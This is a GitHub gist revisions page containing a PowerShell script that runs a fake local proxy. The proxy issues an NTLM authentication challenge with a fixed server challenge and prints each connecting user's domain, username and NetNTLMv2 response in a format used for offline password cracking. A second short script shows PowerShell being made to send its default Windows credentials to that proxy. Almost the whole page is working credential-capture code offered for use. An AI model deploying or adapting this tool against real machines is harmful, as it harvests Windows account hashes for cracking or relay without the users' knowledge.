Last active
April 10, 2025 08:08
-
-
Save leftp/a3330f13ac55f584239baa68a3bb88f2 to your computer and use it in GitHub Desktop.
Revisions
-
leftp revised this gist
Jun 10, 2017 . 2 changed files with 5 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,3 +1,7 @@ #DISCLAIMER #I'm not the original author of the script... #Original git repo vanished function String-to-ByteArray ($String) { $ByteArray=@() This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,4 +1,4 @@ #This file is an example of making powershell connect to the proxyserver localy hosted $wc = New-Object System.Net.WebClient $WebProxy = New-Object System.Net.WebProxy("http://127.0.0.1:8080",$true) -
Jun 8, 2017 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,191 @@ function String-to-ByteArray ($String) { $ByteArray=@() For ( $i = 0; $i -lt ($String.Length/2); $i++ ) { $Chars=$String.Substring($i*2,2) $Byte=[Byte] "0x$Chars" $ByteArray+=$Byte } Return $ByteArray } function ByteArray-to-String ($ByteArray) { ForEach ( $Byte In $ByteArray.ToString().Split(" ") ) { $String="$String"+[Convert]::ToString($Byte,16).ToUpper().PadLeft(2,"0") } Return $String } function strtohex ($str) { $b=$str.ToCharArray(); Foreach ($element in $b) { $c=$c+[System.String]::Format("{0:X}",[System.Convert]::ToUInt32($element)) } return $c } function hextostr ($str) { $temp="" for ($i = 0; $i -lt $str.length; $i += 2) { $temp1=[convert]::Toint32($str.substring($i,2),16) if ($temp1 -ne 0) { $temp=$temp+[char]$temp1 } } return $temp } function strtonullspacedhex ($str) { $b=$str.ToCharArray(); Foreach ($element in $b) { $c=$c+[System.String]::Format("{0:X}",[System.Convert]::ToUInt32($element))+"00" } return $c } function strtohexint ($str,$length) { $tmp="{0:X0}" -f $str if ($tmp.length -eq 1) { $tmp="0"+$tmp } if ($length-$tmp.length -gt 0) { $tmp=$tmp+"0"*($length-$tmp.length) } return $tmp } function strlentohexint ($str,$length) { $tmp="{0:X0}" -f ($str.length/2) if ($tmp.length -eq 1) { $tmp="0"+$tmp } $tmp=$tmp+"0"*($length-$tmp.length) return $tmp } Function hextoint ($h) { $string="" For ( $i = 0; $i -lt ($h.Length/2); $i++ ) { $string=$string+$h.substring(($h.length)-($i*2)-2,2) } Return [convert]::Toint32($string,16) } $code = "f132ae278ad7f7a0" $e = "<html><head>Access Denied</head><body></body></html>" $e2 = "<html><head></head><body></body></html>" $nbdomainname = strtonullspacedhex("NODOMAIN") $dnsdomainname = strtonullspacedhex("NODOMAIN.COM") $computername = strtonullspacedhex("NO") $dnscomputername = strtonullspacedhex("NO.NODOMAIN.COM") $nbdomainnamelen = strlentohexint $nbdomainname 4 $computernamelen = strlentohexint $computername 4 $dnsdomainnamelen = strlentohexint $dnsdomainname 4 $dnscomputernamelen = strlentohexint $dnscomputername 4 $targetinfo = "0200"+$nbdomainnamelen+$nbdomainname+"0100"+$computernamelen+$computername+"0400"+$dnsdomainnamelen+$dnsdomainname+"0300"+$dnscomputernamelen+$dnscomputername+"0500"+$dnsdomainnamelen+$dnsdomainname+"0000"+"0000" $t1=hextoint "38000000" $t2=strlentohexint $nbdomainname 4 $t2=hextoint $t2 $t=($t1+$t2) $targetinfooffset = strtohexint $t 8 $targetinfolen = strlentohexint $targetinfo 4 $hexcode = "4e544c4d53535000"+"02000000"+$nbdomainnamelen+$nbdomainnamelen+"38000000"+"958289e2"+$code+"0000000000000000"+$targetinfolen+$targetinfolen+$targetinfooffset+"0000000000000000"+$nbdomainname+$targetinfo $Encoding = new-object system.text.asciiencoding; $Buffer=new-object system.byte[] 1024; $endpoint = new-object System.Net.IPEndPoint ([system.net.ipaddress]::loopback, 8080) $listener = new-object System.Net.Sockets.TcpListener $endpoint $listener.start() while ($true) { $client = $listener.AcceptTcpClient() $Stream = $client.GetStream() $reader = New-Object System.IO.StreamReader $Stream $writer = New-Object System.IO.StreamWriter $Stream #While($client.connected) #{ $Result="" While($Stream.DataAvailable) { $Read=$Stream.Read($Buffer,0,1024); $Result+=$Encoding.GetString($Buffer, 0, $Read) #$Result+=$Buffer[0..$Read] } if ($Result -ne "") { $Result if ($Result -like "CONNECT*" -or $Result -like "GET*") { if ($Result -like "*Proxy-Authorization:*") { $b=($Result.split("`r`n") | Select-String -Pattern ("Proxy-Authorization")).tostring() $b=$b.split(" ")[$b.split(" ").length-1].split("`r`n")[0] $b=[System.Convert]::FromBase64String($b) -join " " $b=ByteArray-to-string $b if ($b.substring(8*2,4*2) -eq "01000000") { $t=string-to-bytearray $hexcode $t=[System.Convert]::ToBase64String($t) $res="HTTP/1.1 407 Proxy Authorization Required`r`nProxy-Authenticate: Negotiate " + $t + "`r`nContent-Type: text/html`r`nContent-Length: " + $e.length.tostring() + "`r`n`r`n" + $e $writer.write($res) $writer.flush() } if ($b.substring(8*2,4*2) -eq "03000000") { $offset_NTLMresponse = hextoint $b.substring(24*2,4*2) $length_NTLMresponse = hextoint $b.substring(20*2,2*2) $NTProofStr = $b.substring($offset_NTLMresponse*2,16*2) $NTLMresponse = $b.substring(($offset_NTLMresponse*2)+$NTProofStr.length,$length_NTLMresponse*2-$NTProofStr.length) $offset_domain = hextoint $b.substring(32*2,4*2) $length_domain = hextoint $b.substring(28*2,2*2) $offset_user = hextoint $b.substring(40*2,4*2) $length_user = hextoint $b.substring(36*2,2*2) $domain = $b.substring($offset_domain*2,$length_domain*2) $user = $b.substring($offset_user*2,$length_user*2) $user=hextostr $user $domain= hextostr $domain write-host "" write-host "" write-host $user"::"$domain":"$code":"$NTProofStr":"$NTLMresponse write-host "" write-host "" $res="HTTP/1.1 200 OK`r`nContent-Type: text/html`r`nContent-Length: " + $e2.length.tostring() + "`r`n`r`n" + $e2 $writer.write($res) $writer.flush() } } else { $res="HTTP/1.1 407 Proxy Authorization Required`r`nProxy-Authenticate: Negotiate`r`nProxy-Authenticate: NTLM`r`nContent-Type: text/html`r`nContent-Length: " + $e.length.tostring() + "`r`n`r`n" + $e $writer.write($res) $writer.flush() } } } #} $client.Dispose() $writer.Dispose() $reader.Dispose() $stream.Dispose() } $listener.stop() This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,7 @@ #This file is an exmaple of making powershell connect to the proxyserver localy hosted $wc = New-Object System.Net.WebClient $WebProxy = New-Object System.Net.WebProxy("http://127.0.0.1:8080",$true) $WebProxy.UseDefaultCredentials = $true $wc.Proxy = $WebProxy $wc.DownloadString("http://www.google.com")
leftp
revised
this gist